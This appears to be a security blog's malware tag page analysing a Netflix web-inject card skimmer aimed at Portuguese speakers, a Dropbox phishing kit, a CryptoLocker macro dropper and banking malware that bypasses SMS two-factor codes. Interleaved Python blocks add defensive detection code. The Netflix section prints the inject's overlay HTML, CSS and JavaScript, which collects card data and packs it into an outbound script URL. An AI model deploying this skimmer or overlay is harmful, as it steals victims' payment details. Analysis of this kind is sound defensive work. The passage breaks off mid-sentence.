
Tag: malware

NETFLIX malware/phishing attack targeting Portuguese-speaking countries

Netflix is one of the most popular streaming platforms all over the world, especially because of its “hottest” TV series. But this popularity has also attracted criminals looking for new ways to steal money. During the last months Netflix has been targeted by malware written to steal credit card information and user credentials. The attack uses the same methodology as financial malware like Dridex/Zeus: web injects.

Once the user has been infected, the malware waits until the user loads the Netflix login page. As soon as the page is accessed and the browser loads the content from the server, the malware injects malicious HTML, JavaScript and CSS into it.

The injected code is activated on GET or POST requests to URLs matching the pattern **, as configured by the line:

set_url ** GP

where G= GET and P=POST
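An added example, not code or configuration from the post or from the malware: a small parser for set_url entries in this style of webinject configuration. It assumes the common Zeus-family layout where each set_url line is followed by data_before / data_inject / data_after blocks, each closed by data_end; it maps the G and P flags to HTTP methods and turns the * wildcards into a URL match so an analyst can check which requests would trigger an inject. The sample config is constructed.

```python
import re
from dataclasses import dataclass
# Flags described on the page: G = trigger on GET, P = trigger on POST
FLAG_METHODS = {"G": "GET", "P": "POST"}

@dataclass
class Inject:
    url_pattern: str
    flags: str
    data_before: str = ""
    data_inject: str = ""
    data_after: str = ""
    def methods(self):
        # Other flag letters are non-method options and are ignored here
        return [m for f, m in FLAG_METHODS.items() if f in self.flags]
    def matches(self, method, url):
        # '*' in set_url is a wildcard; the rest of the pattern is literal
        regex = "^" + ".*".join(re.escape(p) for p in self.url_pattern.split("*")) + "$"
        return method.upper() in self.methods() and re.match(regex, url) is not None

def parse_webinject_config(text):
    """One Inject per set_url entry; the data_* block layout is assumed."""
    injects, current, section, buf = [], None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if section is None and line.startswith("set_url"):
            parts = line.split()
            current = Inject(parts[1], parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif section is None and line in ("data_before", "data_inject", "data_after"):
            section, buf = line, []
        elif line == "data_end" and section is not None and current is not None:
            setattr(current, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(raw)
    return injects

# Constructed sample; the real config on the page only shows "set_url ** GP"
SAMPLE_CONFIG = """\
set_url https://www.example-streaming.test/login* GP
data_before
<body*>
data_end
data_inject
<div class="ontop" id="popDiv">...</div>
data_end
"""
```

With the page's own pattern, Inject("**", "GP") matches every URL, so the inject is gated only by the data_before marker it looks for in the page.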

Once the page is loaded the malware injects the following code:

CSS code

/* Full-page overlay that covers the real Netflix page; hidden until the inject shows it */
.ontop {
    z-index: 999;
    width: 100%;
    height: 100%;
    top: 0;
    left: 0;
    display: none;
    position: absolute;
}
.ontop2 {
    top: 50%;
    left: 50%;
    margin-bottom: 0;
    align-content: center;
}
/* The fake "payment problem" dialog, centred and styled to look like Netflix */
#popup {
    padding: 10px;
    width: 1224px;
    height: 700px;
    position: absolute;
    color: #fff;
    top: 50%;
    left: 50%;
    margin-top: -400px;
    margin-left: -600px;
    font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
    font-size: 12px;
    background: #000000;
}
#cc_form input {
    width: 100%;
    height: 50px;
    padding: 9px;
    border-radius: 2px;
    border: 1px solid #999;
    color: #fff;
    background-color: #333;
}
#cc_form td {
    padding-top: 10px;
    color: #eee;
    font-size: 12px;
}
/* Red "CONTINUAR" button mimicking the site's own buttons */
#cc_submit {
    text-decoration: none;
    color: white;
    padding-bottom: 12px;
    padding-left: 28px;
    padding-right: 28px;
    padding-top: 12px;
    text-align: center;
    border-radius: 2px;
    background: #ff3019;
    background: -moz-linear-gradient(top, #ff3019 0%, #cf0404 100%);
    background: -webkit-linear-gradient(top, #ff3019 0%, #cf0404 100%);
    background: linear-gradient(to bottom, #ff3019 0%, #cf0404 100%);
    filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff3019', endColorstr='#cf0404', GradientType=0);
}
#cc_submit:hover {
    background: #ff1a00;
    background: -moz-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
    background: -webkit-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
    background: linear-gradient(to bottom, #ff1a00 0%, #ff1a00 100%);
    filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff1a00', endColorstr='#ff1a00', GradientType=0);
}
JavaScript code

// Client-side validation of the fake payment form. valid_credit_card() and
// setCookie() are helpers of the inject that the published sample does not show.
function submitMe(){
    if (document.getElementById("cc_number").value == "") {
        alert("Ingresse um numero de Cartao");
        return false;
    } else {
        if (valid_credit_card(document.getElementById("cc_number").value)) {}
        else {
            alert("Ingresse um numero Valido");
            return false;
        }
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o mes de validade!");
        return false;
    }
    // The sample checks cc_month a second time (apparently a copy-paste slip),
    // so the expiry year is never actually validated.
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o ano de validade!");
        return false;
    }
    if (document.getElementById("cc_ccv").value == "") {
        alert("Ingresse o codigo de segurança do seu cartao!");
        return false;
    }
    if (document.getElementById("cc_name").value == "") {
        alert("Ingresse o seu nome Completo!");
        return false;
    }

    // The card data is packed into the query string of a <script> URL;
    // _link_ (the collection server) is blanked in the published sample.
    var _link_ = "";
    var _url_ = _link_ + 'CC=' + document.getElementById("cc_number").value + '&month=' + document.getElementById("cc_month").value + '&year=' + document.getElementById("cc_year").value + '&cvv=' + document.getElementById("cc_ccv").value + '&name=' + document.getElementById("cc_name").value;
    var head = document.getElementsByTagName("head")[0];
    var script_ = document.createElement('script');
    script_.src = _url_;
    script_.type = 'text/javascript';
    setCookie("WeAre", "Foda", 365);
    // the published sample ends here
}

HTML code

<div class="ontop" id="popDiv">
  <div id="popup">
    <img src="" width="128">
    <h4>Houve um problema com seus dados de pagamento.</h4>
    <p>Desculpe-nos por interromper o show, mas não foi possível confirmar suas informações de pagamento. Mas não se preocupe! Insira os dados no campo abaixo para</p>
    <form id="cc_form" name="cc_form">
      <table width="100%">
        <tr>
          <td colspan="2">Numero do cartão: <input id="cc_number" name="cc_number" placeholder="E.g. 0000 0000 0000 0000" type="text"></td>
        </tr>
        <tr>
          <td>Validade: <input id="cc_month" name="cc_month" placeholder="MM" style="width: 45% !important;" type="text"> <input id="cc_year" name="cc_year" placeholder="AA" style="width: 45% !important;" type="text"></td>
          <td>Codigo de segurança: <input id="cc_ccv" name="cc_ccv" placeholder="" type="text"></td>
        </tr>
        <tr>
          <td colspan="2">Nome do titular (conforme escrito no cartão): <input id="cc_name" name="cc_name" type="text"></td>
        </tr>
      </table>
      <a href="" id="cc_submit" onclick="submitMe();">CONTINUAR</a>
    </form>
  </div>
</div>
In order to see how the malware interacts with the user, we can inject the code in the browser where the Netflix login page is loaded.

The malware checks whether the inserted credit card number is valid or not.

With a valid credit card number it is possible to submit the request, triggering the submitMe() JavaScript function (shown above).


Phishing Attack #4 – Dropbox

Clone kit revealed

A new fake Dropbox phishing scam targeting users of the online sharing and storage platform is currently in circulation. The scam invites readers to view files shared by another Dropbox user and to click on a link that redirects to a phishing website.

However, this phishing scam actually tries to fool users into submitting the username and password of their email account (Yahoo, Outlook, Gmail, AOL or others) in order to gain access to it.


Clicking on the icons, a modal pops up asking for credentials.


Once the credentials are filled and the “Submit” button is clicked, the credentials are sent through email to the phisher. 

Analyzing the web server, it is possible to retrieve the clone kit used by the attacker to create the phishing website. The clone kit is very simple and was developed with basic programming skills. Below are the structure and the source code of submit.php; “form.php” and “index.php” are 99% HTML code.


The developer downloaded all the icons locally to avoid detection.



Dropbox can easily identify this phishing attack by analyzing the HTTP Referer header of the requests it receives, because the phishing website redirects victims to the official Dropbox website.
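One way to implement that check on the real service's side, as an added example that is not part of the original post: it scans access-log lines in the common "combined" format and counts visitors arriving from Referer hosts outside an allowlist of the service's own hostnames, so a kit that redirects its victims to the real site surfaces as an unfamiliar referring host. The hostnames and log lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache/nginx "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Hostnames of the real service itself (constructed); traffic from these is expected
OWN_HOSTS = {"www.dropbox.test", "dropbox.test"}

def referer_host(ref):
    if not ref or ref == "-":
        return None
    return urlsplit(ref).hostname

def suspicious_referers(lines, min_hits=2):
    """Count visitors per external Referer host. A phishing kit that
    redirects victims to the real site after harvesting shows up here."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        host = referer_host(m.group("referer"))
        if host is None or host in OWN_HOSTS:
            continue
        hits[host] += 1
    return {h: c for h, c in hits.items() if c >= min_hits}

# Constructed sample log lines: two victims arriving from a phishing kit,
# one internal navigation, one direct visit
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Oct/2016:11:27:16 +0000] "GET /home HTTP/1.1" 200 512 "http://dropbox-shared-files.example/submit.php" "Mozilla/5.0"',
    '203.0.113.8 - - [13/Oct/2016:11:28:02 +0000] "GET /home HTTP/1.1" 200 512 "http://dropbox-shared-files.example/submit.php" "Mozilla/5.0"',
    '198.51.100.4 - - [13/Oct/2016:11:30:44 +0000] "GET /home HTTP/1.1" 200 512 "https://www.dropbox.test/login" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Oct/2016:11:31:10 +0000] "GET /home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

In practice the allowlist also needs search engines and partner sites, and the count threshold keeps one-off referrers from flooding the review queue.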





“CryptoLocker was a ransomware trojan which targeted computers running Microsoft Windows and was first observed by Dell SecureWorks in September 2013. CryptoLocker propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts certain types of files stored on local and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware’s control servers. The malware then displays a message, which offers to decrypt the data if a payment (through either Bitcoin or a pre-paid cash voucher) is made by a stated deadline, and threatened to delete the private key if the deadline passes. If the deadline is not met, the malware offered to decrypt data via an online service provided by the malware’s operators, for a significantly higher price in Bitcoin” (Wikipedia)

Infection Process

The CryptoLocker infection process starts when a Microsoft Office Word document is opened. Microsoft allows users to embed macro scripting code inside documents and gives the possibility to execute it automatically when the document is opened.

“A macro is a series of commands and actions that help to automate some tasks – effectively a program but usually quite short and simple. However they are created, they need to be executed by some system which interprets the stored commands” (Wikipedia)

Analyzing the documents we received through a suspicious mail, we extracted the macro inside. The macro used by the attackers to infect the machine is a Visual Basic module that creates new files inside the TEMP folder and downloads the real malware from a C&C server through an HTTP GET request. To avoid antivirus detection, the malware is disguised as a .PNG image that contains VB code.

Here is a sample taken from the original macro that shows how the malware communicates with its C&C server and how the code is obfuscated.


Many characters are obfuscated (xx) on purpose. The macro we found inside is a VB macro with many functions to hook the malware and download the real .exe from another server.

After the dropper executes the malware, the system encrypts the personal files with a public PGP key and stores the private key on the C&C server with a time bomb.
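An added check, not from the post or from the malware, for the disguise described above (VB code delivered under a .PNG name): the downloaded "image" is walked as a PNG chunk stream, and if it is not structurally a PNG but reads as VB-like text it is flagged. The sample bytes are constructed; the tiny PNG has only IHDR and IEND chunks, enough for the structural check.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def png_chunks_valid(data):
    """Walk the chunk stream: a real PNG starts with the signature, has IHDR
    first, IEND last, and every chunk is length + type + data + CRC."""
    if not data.startswith(PNG_SIG):
        return False
    pos, first, last = len(PNG_SIG), None, None
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        first = first or ctype
        last = ctype
        pos += 12 + length
    return pos == len(data) and first == b"IHDR" and last == b"IEND"

def looks_like_script(data):
    """Heuristic: the first 4 KiB is mostly printable text with VB keywords."""
    sample = data[:4096]
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in sample)
    if not sample or printable / len(sample) < 0.9:
        return False
    text = sample.decode("ascii", "ignore").lower()
    return any(k in text for k in ("sub ", "function ", "createobject", "wscript", "shell"))

def classify_png_download(data):
    """'png', 'script-disguised-as-png' or 'not-a-png' for a fetched file body."""
    if png_chunks_valid(data):
        return "png"
    if looks_like_script(data):
        return "script-disguised-as-png"
    return "not-a-png"

def _chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

# Constructed samples: a minimal 1x1 PNG skeleton and a VB stub served as "image.png"
TINY_PNG = PNG_SIG + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)) + _chunk(b"IEND", b"")
FAKE_PNG = b'Sub AutoOpen()\r\n  Set o = CreateObject("MSXML2.XMLHTTP")\r\nEnd Sub\r\n'
```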





During the last few years banks, and other financial institutions, have been trying to prevent fraud and cyber-attacks from accessing their customers’ credentials. They increased security and login factors to avoid these kinds of problems. One of these is Two Factor Authentication (2FA), used to “help” the username and password protect the bank account.

However, today this system is hackable by malicious users. Trend Micro said:

“The attack is designed to bypass a certain two-factor authentication scheme used by banks. In particular, it bypasses session tokens, which are frequently sent to users’ mobile devices via Short Message Service (SMS). Users are expected to enter a session token to activate banking sessions so they can authenticate their identities. Since this token is sent through a separate channel, this method is generally considered secure”.

This article is a real use case of this kind of malicious software. During our recent analysis of malware targeting Italian financial institutions, we found a very powerful piece of it that can bypass the 2FA with a malicious app installed on the phone. Malware like this can drive the user to download the fake application on their phone from the official Google Play Store, using a Man-in-the-Browser (MITB) attack. Once on the user’s PC, the attacker can take full control of the machine and interact with it through a Command and Control (C&C) server. What we explain in this article is a real active botnet with at least 40 compromised zombie hosts.


During the last few days we have been seeing criminals developing more sophisticated solutions and showing increasing knowledge of mobile and web programming. This scenario is spreading throughout the entire world, though it is concentrated mostly in Europe. Criminals are developing solutions to bypass the 2FA used by 90% of banks, by developing “legal” applications published in the Google Play Store and Apple App Store. These applications can steal information on the phone and intercept and send it over the network silently. The latest operation, named “Operation Emmental” and discovered by Trend Micro, is acting in just this way. In this section, we will discover how a criminal can force a user to download and install the mobile application.

When the malware infects the machine and the user navigates to the online banking platform, a MITB attack starts injecting JavaScript code inside the browser. This injection modifies some data in the page while keeping the same structure. During navigation, the hacked website invites the user to download the fake application, explaining all the steps to insert their bogus data. The app can be downloaded in two different ways:

SMS (by inserting your number in the fake form, you receive an SMS with the download link to the store)

